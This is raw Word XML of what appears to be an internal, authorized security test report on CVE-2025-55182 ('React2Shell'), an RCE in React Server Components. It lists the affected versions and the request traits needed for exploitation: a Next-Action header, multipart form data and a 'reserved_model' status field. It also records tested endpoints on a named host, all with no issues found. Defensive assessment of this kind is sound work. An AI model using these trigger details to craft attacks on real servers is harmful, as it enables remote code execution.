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13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE79D">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE79E">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE79F">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7A0">
      <w:pPr>
        <w:pStyle w:val="13"/>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 Q4 CVE 2025 55182 React2Shell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 Q4 CVE 2025 55182 React2Shell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13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7A2">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7A3">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7A4">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7A5">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7A6">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7A7">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7A8">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7A9">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7AA">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7AB">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7AC">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7AD">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7AE">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7AF">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7B0">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7B1">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7B2">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7B3">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7B4">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7B5">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7B6">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7BD">
      <w:pPr>
        <w:ind w:left="1133"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId3" w:type="default"/>
          <w:footerReference r:id="rId4" w:type="default"/>
          <w:type w:val="continuous"/>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br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9CE7BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"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t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9CE7BF">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc135653246"/>
      <w:bookmarkStart w:id="1" w:name="_Toc157677707"/>
      <w:bookmarkStart w:id="2" w:name="_Toc135662402"/>
      <w:bookmarkStart w:id="3" w:name="_Toc32472"/>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218912C7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="336" w:line="336" w:lineRule="atLeast"/>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As part of the ongoing security assurance activities, testing was conducted against </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>recently disclosed vulnerabilities (including CVE-2025-55182)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to proactively assess whether the organization’s hosted applications are susceptible to emerging threats. This assessment aimed to validate the effectiveness of existing security controls and ensure that newly identified attack techniques do not impact the application environment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9CE7C3">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SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The testing was performed in a controlled manner within an authorized test scope to identify potential exposure early and reduce the risk of exploitation from evolving threat vectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9CE7C4">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E">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F">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0">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3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="242424"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc135662403"/>
      <w:bookmarkStart w:id="5" w:name="_Toc135653247"/>
    </w:p>
    <w:p w14:paraId="16A8488A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9CE7D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="307AE368">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="481E3266">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4873E353">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>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26"/>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1CF6265F">
          <w:pPr>
            <w:pStyle w:val="25"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="1047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_Toc32472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tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc32472 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>2</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="1A6C416B">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_Toc23560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25Q4 CVE 2025-55182 React2Shell</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc23560 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>4</w:t>
          </w:r>
          <w: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37FFDC9A">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc23560"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>25Q4 CVE 2025-55182 React2Shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5533397F">
      <w:pPr>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7A45C12A">
      <w:pPr>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A vulnerability affects certain React packages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC54249">
      <w:pPr>
        <w:spacing w:line="36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Affected Versions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9AD6E0">
      <w:pPr>
        <w:pStyle w:val="20"/>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CVE-2025-55182 is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>critical pre-authentication remote code execution (RCE) vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>React Server Components</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0. The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> affected and patched versions are given below</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C03976D">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6647180" cy="986790"/>
            <wp:effectExtent l="0" t="0" r="12700" b="38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6647180" cy="986790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DCC7FB">
      <w:pPr>
        <w:pStyle w:val="20"/>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vulnerability arises from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>unsafe deserialization of payloads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> received via HTTP requests to Server Function endpoints. Because the deserialization process does not properly validate or sanitize incoming data, an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>unauthenticated attacker can craft malicious payloads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that, when processed, allow arbitrary code execution on the server. This means exploitation requires </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>no authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>, making it especially dangerous in exposed environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C718AC">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left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Style w:val="21"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Full remote compromise of affected servers, enabling attackers to execute arbitrary code, potentially leading to data theft, service disruption, or lateral movement within the environmen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>t.</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2476939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React 19.0.0, 19.1.0, 19.1.1, and 19.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05196D9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Next.js versions ≥14.3.0-canary.77, all 15.x, and 16.x releases prior to patching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3522655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Other frameworks using RSC: React Router (RSC mode), Waku, Redwood SDK, and various RSC plugins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04393421">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For the Vulnerability to succeed the following elements are needed </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F81637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Next-Action </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B16DF4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multipart/form-data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349EAFB0">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Elements within form-data with elements such as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"status": "reserved_model"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> within the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F40427D">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Test against Helpdesk-dev.zalaris.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BA7884">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following HTTP Method : host : port : path combinations were tested and no issues were found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E3DAD4">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:leftChars="0" w:hanging="36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GET : localhost : 3000 : /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45880EF1">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:leftChars="0" w:hanging="36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POST : localhost :3000 : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/api/v1/tickets/551942/entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC2DB5E">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:leftChars="0" w:hanging="36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POST : helpdesk-dev.zalaris.com : 443 : /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F892911">
      <w:pPr>
        <w:keepNext w:val="0"/>
